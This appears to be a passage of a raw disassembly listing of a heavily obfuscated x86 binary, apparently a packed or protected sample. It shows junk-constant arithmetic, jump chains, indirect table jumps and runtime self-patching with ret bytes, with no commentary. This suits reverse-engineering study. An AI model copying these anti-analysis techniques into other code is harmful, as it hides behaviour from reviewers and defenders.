		cmp	ebp, ebx
		jmp	loc_45A0CA
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_456685:				; CODE XREF: sub_456666:loc_458B37j
		jnz	loc_444CFB

loc_45668B:				; CODE XREF: k2vbe3.d:0043CAD1j
					; k2vbe3.d:loc_444CF5j
		jnb	loc_4434AC
		cmp	dword ptr [ebp-1Ch], 66h
		jnz	loc_43CD8F
		push	offset loc_44349C
		jmp	nullsub_290
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------

loc_4566A5:				; CODE XREF: k2vbe3.d:0043C754j
		mov	ecx, 0E95DF0C3h
		jnp	loc_448EBE
		add	eax, ebp
; START	OF FUNCTION CHUNK FOR sub_444966

loc_4566B2:				; CODE XREF: sub_444966+169D5j
		add	eax, 14599C0Bh
		jmp	loc_45538B
; END OF FUNCTION CHUNK	FOR sub_444966
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FFDC

loc_4566BD:				; CODE XREF: sub_43FFDC:loc_447C9Bj
		pop	edi
		rol	edi, 5
		or	edi, 9A4F2AD3h
		add	edi, 4D26439h
		mov	[edi], eax
		jmp	loc_44C75C
; END OF FUNCTION CHUNK	FOR sub_43FFDC
; ---------------------------------------------------------------------------

loc_4566D4:				; CODE XREF: k2vbe3.d:0045A2A7j
		js	loc_446131

; =============== S U B	R O U T	I N E =======================================



sub_4566DA	proc near		; CODE XREF: k2vbe3.d:0044C930p

; FUNCTION CHUNK AT 00447FC6 SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	edx
		call	sub_444615
		push	offset loc_45249E
		jmp	loc_447FC6
sub_4566DA	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4508A3

loc_4566EE:				; CODE XREF: sub_4508A3-4F2Fj
					; sub_43CCD0:loc_4547C3j
		push	offset loc_44AA7D
		jmp	nullsub_213
; END OF FUNCTION CHUNK	FOR sub_4508A3

; =============== S U B	R O U T	I N E =======================================



sub_4566F8	proc near		; DATA XREF: sub_449661-CBDCo
		add	ecx, 0DFD0CDC7h
		xchg	ecx, [esp+0]
		jmp	loc_44A065
sub_4566F8	endp


; =============== S U B	R O U T	I N E =======================================



sub_456706	proc near		; CODE XREF: k2vbe3.d:0043E460j
					; sub_446E24+5F6Dp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00443F4E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00446A23 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044960C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045331A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004542F1 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		pop	esi
		xchg	eax, [esp+0]
		push	1298D49Bh
		xchg	ebp, [esp+0]
		mov	edi, ebp
		jmp	loc_44960C
sub_456706	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_45671C:				; CODE XREF: sub_43C3A9+2932j
		pop	edx
		lea	eax, loc_44EAFD
		mov	byte ptr [eax],	0C3h
		jmp	loc_44EAFD
; END OF FUNCTION CHUNK	FOR sub_43C3A9

; =============== S U B	R O U T	I N E =======================================



sub_45672B	proc near		; CODE XREF: sub_402129+B3p
					; sub_45672B+5j
					; DATA XREF: ...
		call	sub_457F1C
		jmp	ds:off_41E098
sub_45672B	endp

; ---------------------------------------------------------------------------

loc_456736:				; CODE XREF: k2vbe3.d:00459D4Dj
		jmp	loc_43DAFC
; ---------------------------------------------------------------------------

loc_45673B:				; DATA XREF: sub_45B4B9+7o
		push	5A0B1EBDh
		pop	edi
		sub	edi, 1312B016h
		add	edi, 0B94C88E7h
		jmp	loc_45479F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ECA6

loc_456752:				; CODE XREF: sub_44ECA6:loc_457E3Dj
		jmp	ds:off_41E06C
; END OF FUNCTION CHUNK	FOR sub_44ECA6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453E9F

loc_456758:				; CODE XREF: sub_453E9F+38FBj
		jmp	nullsub_249
; END OF FUNCTION CHUNK	FOR sub_453E9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_45675D:				; CODE XREF: sub_45A323-1C70Cj
		jmp	nullsub_371
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D823

loc_456762:				; CODE XREF: sub_43D823+17j
		jmp	loc_454600
; END OF FUNCTION CHUNK	FOR sub_43D823

; =============== S U B	R O U T	I N E =======================================



sub_456767	proc near		; CODE XREF: k2vbe3.d:loc_43E7F6j
					; sub_44ECA6p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044F095 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00450FEC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451FB5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00457AA7 SIZE 0000000E BYTES

		pop	edx
		jns	loc_451FB5
		push	offset loc_456518
		jmp	nullsub_215
sub_456767	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_456778:				; CODE XREF: k2vbe3.d:00454D05j
		pop	edx
		push	ebx
		add	esi, 5EB0458Eh
; START	OF FUNCTION CHUNK FOR sub_45282D

loc_456780:				; CODE XREF: sub_45282D+13j
		and	edi, 0D4DA707Eh

loc_456786:				; CODE XREF: k2vbe3.d:loc_44F2A7j
		add	edi, 0EB6F70FEh
		mov	[edi], eax
		jmp	loc_453B61
; END OF FUNCTION CHUNK	FOR sub_45282D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_456793:				; CODE XREF: sub_44C90E:loc_450879j
					; sub_44C90E+43ACj
		cmp	dword ptr [ebp-108h], 31342D37h
		jnz	loc_444C96
		jmp	loc_455386
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		mov	eax, 0B9726E5Ah
		call	sub_4553CC
		mov	ds:off_41E0F8, eax
		lea	eax, sub_453E9F
		mov	byte ptr [eax],	0C3h
		jmp	sub_453E9F
; ---------------------------------------------------------------------------
		call	nullsub_471

loc_4567CB:				; CODE XREF: k2vbe3.d:0043DF9Aj
		jmp	ds:dword_41E0FC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_471. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		jmp	loc_44227B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_157. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456C5F

loc_4567D8:				; CODE XREF: sub_456C5F-137E3j
		lea	eax, sub_448D7F
		mov	byte ptr [eax],	0C3h
		jmp	loc_442697
; END OF FUNCTION CHUNK	FOR sub_456C5F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_4567E6:				; CODE XREF: sub_448D7Fj
		pop	edx
		mov	eax, [esp+4+var_4]
		jmp	loc_447F3D
; END OF FUNCTION CHUNK	FOR sub_448D7F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_387. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_4567F0:				; CODE XREF: sub_44921C+5652j
		jmp	loc_443AB8
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44249A

loc_4567F5:				; CODE XREF: sub_44249A-42F7j
		jmp	loc_444FE9
; END OF FUNCTION CHUNK	FOR sub_44249A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_4567FA:				; CODE XREF: sub_43C3A9+3j
		jmp	loc_44903B
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------

loc_4567FF:				; CODE XREF: k2vbe3.d:loc_444C83j
		mov	eax, [ebp-8]
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp]
		call	sub_45A323
		push	eax
		call	sub_449372
		test	eax, eax
		jmp	loc_45AC48
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454463

loc_45681A:				; CODE XREF: sub_454463:loc_44E58Bj
		cdq
		jmp	loc_45AD12
; END OF FUNCTION CHUNK	FOR sub_454463
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447C43

loc_456820:				; CODE XREF: sub_447C43+3BF1j
		pop	edi
		pushf

loc_456822:				; CODE XREF: sub_447C43:loc_44BEBFj
		xor	eax, eax
		mov	[ebp-0Ch], eax
		lea	eax, [ebp-70h]
		push	ebx
		mov	ebx, eax
		jmp	loc_456F70
; END OF FUNCTION CHUNK	FOR sub_447C43
; ---------------------------------------------------------------------------

loc_456832:				; CODE XREF: k2vbe3.d:004500D5j
		and	edx, 72D0C74h
		sbb	edi, ebx
		xchg	ecx, [eax]
		cdq

loc_45683D:				; CODE XREF: k2vbe3.d:loc_446C75j
		push	edi
		jmp	loc_43E7A4
; ---------------------------------------------------------------------------

loc_456843:				; CODE XREF: k2vbe3.d:0044CCD3j
		jno	loc_44196E

; =============== S U B	R O U T	I N E =======================================



sub_456849	proc near		; CODE XREF: sub_44A6BD-C5E2p

; FUNCTION CHUNK AT 00441346 SIZE 00000008 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	edx, 0E1D23A71h
		jmp	loc_441346
sub_456849	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F20A

loc_456858:				; CODE XREF: sub_44F20A:loc_443E08j
		call	nullsub_1

loc_45685D:				; CODE XREF: k2vbe3.d:loc_43FA27j
		mov	eax, [ebp-4]
		call	sub_447585
		test	al, al
		jnz	loc_45665A

loc_45686D:				; CODE XREF: sub_44F20A-10D01j
					; k2vbe3.d:00442654j ...
		pop	ecx
		jmp	loc_456652
; END OF FUNCTION CHUNK	FOR sub_44F20A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_234. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_456874:				; CODE XREF: sub_44A79B-5D2Ej
		jmp	nullsub_218
; END OF FUNCTION CHUNK	FOR sub_44A79B
; ---------------------------------------------------------------------------

loc_456879:				; CODE XREF: k2vbe3.d:0044AF1Ej
		mov	edx, 0F783B76Fh

; =============== S U B	R O U T	I N E =======================================



sub_45687E	proc near		; CODE XREF: sub_444BD5:loc_43E805p

; FUNCTION CHUNK AT 0044523A SIZE 00000004 BYTES
; FUNCTION CHUNK AT 004597A9 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		rol	eax, 1Ch
		push	esi
		mov	esi, eax
		jmp	loc_4597A9
sub_45687E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44071B

loc_45688D:				; CODE XREF: sub_44071B+63D7j
		mov	[edx-10h], eax

loc_456890:				; CODE XREF: sub_43E3FD+B6BFj
		inc	[ebp+var_4]
		mov	eax, [ebp+arg_0]

loc_456896:				; CODE XREF: sub_43F7AC+2CB7j
		call	sub_456541

loc_45689B:				; CODE XREF: k2vbe3.d:00458A49j
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_44071B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514E2

loc_4568A0:				; CODE XREF: sub_4514E2-357Cj
		jmp	loc_457C65
; END OF FUNCTION CHUNK	FOR sub_4514E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FECA

loc_4568A5:				; CODE XREF: sub_43FECA:loc_43FCB7j
					; sub_43FECA+128C2j
		push	eax
		lea	eax, dword_43D4F0
		push	eax
		push	edx
		mov	edx, eax
		xchg	edx, [esp+0Ch+var_C]
		jmp	loc_452170
; END OF FUNCTION CHUNK	FOR sub_43FECA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_379. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_4568B9:				; CODE XREF: k2vbe3.d:004482BBj
		adc	ebx, 9C036D95h
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_4568BF:				; CODE XREF: sub_43DA1E+A88Cj
		xor	eax, 2FBFFF38h
		call	sub_44ADEC
		jmp	loc_43EB4B
; END OF FUNCTION CHUNK	FOR sub_43DA1E
; ---------------------------------------------------------------------------
		jmp	loc_43D5EE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_4568D4:				; CODE XREF: sub_43F7AC:loc_43D9AFj
		push	esi
		jmp	loc_45136C
; END OF FUNCTION CHUNK	FOR sub_43F7AC

; =============== S U B	R O U T	I N E =======================================



sub_4568DA	proc near		; CODE XREF: sub_450F71:loc_44666Cp
					; k2vbe3.d:00457D67j

; FUNCTION CHUNK AT 0043CDF3 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004468A6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446BA4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D5B6 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044ED7A SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045116E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00454AC5 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xor	edx, 30F4EF1Dh
		add	edx, ebp
		add	edx, 9954DD92h
		mov	edx, [edx]
		push	ecx
		pushf
		jmp	loc_4468A6
sub_4568DA	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4568F5	proc near		; CODE XREF: k2vbe3.d:loc_4578D7j
					; DATA XREF: sub_442CA7:loc_4578CDo

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0045B362 SIZE 00000019 BYTES

		mov	eax, [esp+0]
		push	ebx
		mov	ebx, edx
		xchg	ebx, [esp+4+var_4]
		jmp	loc_45B362
sub_4568F5	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458D4F

loc_456903:				; CODE XREF: sub_458D4F:loc_45BE12j
		add	edi, eax
		jmp	loc_450EA0
; END OF FUNCTION CHUNK	FOR sub_458D4F
; ---------------------------------------------------------------------------

loc_45690A:				; CODE XREF: k2vbe3.d:00448132j
		jp	loc_43F725
; START	OF FUNCTION CHUNK FOR sub_443021

loc_456910:				; CODE XREF: sub_443021+Fj
		add	edi, 0F863BC98h
		xchg	edi, [esp+0]
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_443021
; ---------------------------------------------------------------------------
		push	edi
		push	5DABE18Eh
		jmp	loc_4559CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AA63

loc_456929:				; CODE XREF: sub_45AA63-2B59j
		pop	edx
		and	edx, 3C736B97h
		add	edx, 0E40303B0h
		xchg	edx, [esp+0]
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_45AA63
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EB7

loc_45693E:				; CODE XREF: sub_451EB7+14j
					; sub_44C6CA:loc_456343j
		push	eax
		call	sub_4508A3
		mov	ds:dword_441204, eax
		call	sub_43C248

loc_45694E:				; CODE XREF: k2vbe3.d:00456D5Cj
		jmp	loc_440831
; END OF FUNCTION CHUNK	FOR sub_451EB7
; ---------------------------------------------------------------------------

loc_456953:				; CODE XREF: k2vbe3.d:0043C543j
		pop	eax
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_456954:				; CODE XREF: sub_44471B:loc_43C51Ej
		add	esi, 0FF509947h
		xchg	esi, [esp+0]
		jmp	loc_44624E
; END OF FUNCTION CHUNK	FOR sub_44471B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_456962:				; CODE XREF: sub_44B912-88Ej
		jnz	loc_44E566
		jmp	loc_446923
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_45696D:				; CODE XREF: sub_441D41:loc_441369j
		jo	loc_43C39A
		ja	loc_459784
		mov	[esi], ebp
		jmp	loc_43DD83
; END OF FUNCTION CHUNK	FOR sub_441D41
; ---------------------------------------------------------------------------

loc_456980:				; CODE XREF: k2vbe3.d:00452AE9j
		pop	ebx
		jmp	loc_4550AA
; ---------------------------------------------------------------------------

locret_456986:				; CODE XREF: k2vbe3.d:loc_456BD1j
		retn
; ---------------------------------------------------------------------------

locret_456987:				; CODE XREF: k2vbe3.d:loc_43FA22j
		retn
; ---------------------------------------------------------------------------

loc_456988:				; DATA XREF: k2vbe3.d:00453E4Bo
		ror	eax, 5
		mov	ds:dword_441754, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4461D5

loc_456992:				; CODE XREF: sub_4461D5+5A84j
		rol	eax, 5
		jmp	loc_4484FA
; END OF FUNCTION CHUNK	FOR sub_4461D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E481

loc_45699A:				; CODE XREF: k2vbe3.d:0044294Ej
					; sub_44E481-6963j
		jnz	loc_45A71B
		jmp	loc_45387B
; END OF FUNCTION CHUNK	FOR sub_44E481
; ---------------------------------------------------------------------------
		push	6089BDF8h
		pop	eax
		or	eax, 0F06E7DE3h
		and	eax, 0D6669B00h
		or	eax, 14769E9Ch
		jnz	loc_43DE9F
		add	ebx, esi
		jmp	loc_43DE99
; ---------------------------------------------------------------------------

loc_4569CA:				; CODE XREF: k2vbe3.d:loc_449E26j
		rol	ecx, 13h
		jge	loc_453502
		jmp	loc_4555D4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456100

loc_4569D8:				; CODE XREF: sub_456100:loc_456108j
		mov	ecx, eax
		xchg	ecx, [esp+0]

loc_4569DD:				; CODE XREF: sub_43F34C:loc_4400C9j
		call	sub_453347

locret_4569E2:				; CODE XREF: sub_44ED3C+667Aj
		retn
; END OF FUNCTION CHUNK	FOR sub_456100
; ---------------------------------------------------------------------------

loc_4569E3:				; CODE XREF: k2vbe3.d:0044AEB0j
					; k2vbe3.d:00457EB5j
		jo	loc_43E63A
		push	offset loc_455C63
		jmp	locret_454401
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_195. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440D7B

loc_4569F4:				; CODE XREF: sub_440D7B+AABj
		jmp	loc_45281C
; END OF FUNCTION CHUNK	FOR sub_440D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446478

loc_4569F9:				; CODE XREF: sub_446478+Aj
		push	480BEE81h
		pop	ebx
		add	ebx, 36301263h
		jnz	loc_459AB0
		and	ebp, edi
		xor	edi, 0D076CB6h
		jmp	loc_459AB0
; END OF FUNCTION CHUNK	FOR sub_446478
; ---------------------------------------------------------------------------
		xchg	ebx, ecx
		jmp	sub_4501CC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_103. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_456A20:				; CODE XREF: sub_44128B+14EB7j
		jmp	loc_44A3B5
; END OF FUNCTION CHUNK	FOR sub_44128B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4536DC

loc_456A25:				; CODE XREF: sub_4536DC-1487Bj
		jz	loc_44CAD7
		jmp	loc_45409F
; END OF FUNCTION CHUNK	FOR sub_4536DC
; ---------------------------------------------------------------------------

loc_456A30:				; CODE XREF: k2vbe3.d:loc_440DD2j
		jnz	loc_447915
		jmp	loc_44D80E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF16

loc_456A3B:				; CODE XREF: sub_44DF16+4A4Aj
		or	eax, ebx

loc_456A3D:				; CODE XREF: sub_44DF16:loc_452954j
		or	eax, 0A06DB800h
		add	eax, 0A6071F45h
		add	eax, ebp
		jmp	loc_452F3D
; END OF FUNCTION CHUNK	FOR sub_44DF16
; ---------------------------------------------------------------------------
		sbb	edx, eax
		adc	ebp, esi
		jmp	sub_44E2C0
; ---------------------------------------------------------------------------

locret_456A59:				; CODE XREF: k2vbe3.d:loc_458BF4j
		retn
; ---------------------------------------------------------------------------

loc_456A5A:				; CODE XREF: k2vbe3.d:004485F9j
		jmp	sub_43E282

; =============== S U B	R O U T	I N E =======================================



sub_456A5F	proc near		; CODE XREF: sub_43C418+11p
					; sub_456541-11329p ...
		jns	sub_43D98C
		push	ebp
		mov	ebp, esp
		push	offset sub_44791F
		jmp	nullsub_223
sub_456A5F	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_456A72:				; CODE XREF: k2vbe3.d:0044EDD7j
					; sub_444D7B:loc_45BFA4j
		jz	loc_450844

loc_456A78:				; CODE XREF: sub_45A1CB+10j
		jmp	loc_4465A1
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D612

loc_456A7D:				; CODE XREF: sub_43D612+13000j
		jmp	loc_4519BC
; END OF FUNCTION CHUNK	FOR sub_43D612
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F42B

loc_456A82:				; CODE XREF: sub_44F42B-3EA7j
		jmp	loc_449366
; END OF FUNCTION CHUNK	FOR sub_44F42B
; ---------------------------------------------------------------------------
		sbb	edi, 6CC35Ch
		mov	[eax], ebx
		pushf
		jmp	loc_450844
; ---------------------------------------------------------------------------

loc_456A95:				; DATA XREF: sub_455F6B-10CE6o
		pushf
		push	876F8669h
		pop	eax
		rol	eax, 16h
		xor	eax, 53A79396h
		add	eax, ebp
		add	eax, 3639B785h
		mov	eax, [eax]
		jmp	loc_441E03
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_456AB4:				; CODE XREF: sub_44ED3C+6680j
		shl	esi, 1Dh

loc_456AB7:				; CODE XREF: sub_44ED3C+6672j
		add	eax, 1498969h
		jmp	loc_440191
; END OF FUNCTION CHUNK	FOR sub_44ED3C

; =============== S U B	R O U T	I N E =======================================



sub_456AC2	proc near		; CODE XREF: k2vbe3.d:00442EA9j
					; k2vbe3.d:00449332p
		xchg	eax, [esp+0]
		pop	eax
		ror	eax, 11h
		mov	ds:dword_441748, eax
		jmp	nullsub_528
sub_456AC2	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_456AD4:				; CODE XREF: sub_447E07-4ACEj
		xor	eax, ebp

loc_456AD6:				; CODE XREF: sub_447E07:loc_4402A6j
		push	11E12051h
		xor	eax, 99E6CEF6h
		jmp	loc_455978
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------

loc_456AE6:				; CODE XREF: k2vbe3.d:0044D76Cj
		sbb	edx, 0A8484A98h
		pop	eax

loc_456AED:				; CODE XREF: k2vbe3.d:0044D75Cj
		add	ecx, 0FA1159F8h
		and	ecx, 9D875AD3h

loc_456AF9:				; CODE XREF: k2vbe3.d:loc_449860j
		add	ecx, 0E7BFC878h
		mov	[ecx], eax
		pop	ecx
		jmp	loc_4442A3
; ---------------------------------------------------------------------------

loc_456B07:				; CODE XREF: k2vbe3.d:0043ECA7j
		or	esi, edx

loc_456B09:				; CODE XREF: k2vbe3.d:loc_4492A4j
		push	edi
		mov	edi, eax
		xchg	edi, [esp]
		lea	eax, dword_43D4F0
		push	eax
		push	edi
		mov	edi, eax
		jmp	loc_44AE62
; ---------------------------------------------------------------------------

loc_456B1E:				; DATA XREF: sub_4460FD+E0A5o
		xor	eax, edi
		pop	edi
		rol	eax, 17h
		call	sub_4575DF
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_456B29:				; CODE XREF: sub_443FC1-3B52j
		jz	loc_43D25E
		jmp	loc_44CE81
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_456B34:				; CODE XREF: sub_4479A1:loc_454E7Ej
		xchg	eax, [esp+0]
		push	0
		push	ecx
		push	7713B0CCh
		pop	ecx
		and	ecx, 7549BE0h
		add	ecx, 0F8EF6F40h
		jmp	loc_45432B
; END OF FUNCTION CHUNK	FOR sub_4479A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_456B51:				; CODE XREF: sub_445124+C565j
		cmp	ecx, 1531A7CDh
		jmp	loc_458967
; END OF FUNCTION CHUNK	FOR sub_445124
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_87. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_456B5D:				; CODE XREF: sub_43DEBE+A6A4j
		jmp	loc_44E77E
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45775D

loc_456B62:				; CODE XREF: sub_45775D-18630j
		jmp	loc_45AD9E
; END OF FUNCTION CHUNK	FOR sub_45775D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_456B67:				; CODE XREF: sub_456666-8627j
		and	ecx, 0A0709D0h
		push	offset loc_456E3F
		jmp	sub_452F31
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DF16

loc_456B77:				; CODE XREF: sub_44DF16:loc_452F3Dj
		push	offset sub_454F1F
		jmp	nullsub_224
; END OF FUNCTION CHUNK	FOR sub_44DF16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_456B81:				; CODE XREF: sub_4440E5-5D34j
		xor	eax, 0AB0CF207h
		add	eax, ebp
		add	eax, 125AADAEh
		mov	eax, [eax]
		push	eax
		call	sub_43E282

loc_456B97:				; CODE XREF: sub_43CF35+B92Bj
					; sub_4440CA:loc_44B885j ...
		js	loc_44B621
		jmp	loc_43E80A
; END OF FUNCTION CHUNK	FOR sub_4440E5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_456BA2:				; CODE XREF: sub_44C90E+3259j
		jno	loc_43F85D
		adc	edx, 8656B00Ch
		mov	edi, 76EBA975h
		push	ecx
		jmp	loc_4539EE
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458D80

loc_456BB9:				; CODE XREF: sub_458D80:loc_45300Fj
		jge	loc_45A36B
; END OF FUNCTION CHUNK	FOR sub_458D80
; START	OF FUNCTION CHUNK FOR sub_44FF97

loc_456BBF:				; CODE XREF: sub_44FF97+B04Dj
		jmp	loc_43F971
; END OF FUNCTION CHUNK	FOR sub_44FF97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_456BC4:				; CODE XREF: sub_44B2D7+13j
		jmp	loc_4477FA
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
		sbb	edx, ebx
		jmp	loc_45A365
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_409. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_456BD1:				; CODE XREF: k2vbe3.d:0043DD27j
		jmp	locret_456986
; ---------------------------------------------------------------------------

loc_456BD6:				; CODE XREF: k2vbe3.d:0043C0A0j
		jge	loc_43D78C
		shl	edx, 14h
		or	edi, ebp
; START	OF FUNCTION CHUNK FOR sub_4490B2

loc_456BE1:				; CODE XREF: sub_4490B2:loc_4550E7j
		add	ecx, 0D43F8848h
		xchg	ecx, [esp+0]
		jmp	loc_4467D2
; END OF FUNCTION CHUNK	FOR sub_4490B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_456BEF:				; CODE XREF: sub_45A323-41FCj
		cdq
		jmp	loc_442E0B
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_456BF5:				; CODE XREF: sub_43CCD0+9CE1j
		jp	loc_44A900
		shr	eax, 1Eh
		mov	[ebx], edi
		jmp	loc_459336
; ---------------------------------------------------------------------------

loc_456C05:				; CODE XREF: sub_43CCD0+115B1j
		js	loc_456325
		xor	ebp, edx

loc_456C0D:				; CODE XREF: sub_448D7F:loc_4500EEj
		push	esi
		sbb	ebx, ecx
		jmp	loc_45540E
; END OF FUNCTION CHUNK	FOR sub_43CCD0

; =============== S U B	R O U T	I N E =======================================



sub_456C15	proc near		; CODE XREF: sub_457D4B:loc_4441EDp
					; k2vbe3.d:00446B82j

; FUNCTION CHUNK AT 0043C2DF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043CA4F SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043D6A7 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0043DD49 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043E546 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00440032 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442B82 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004445CE SIZE 00000005 BYTES
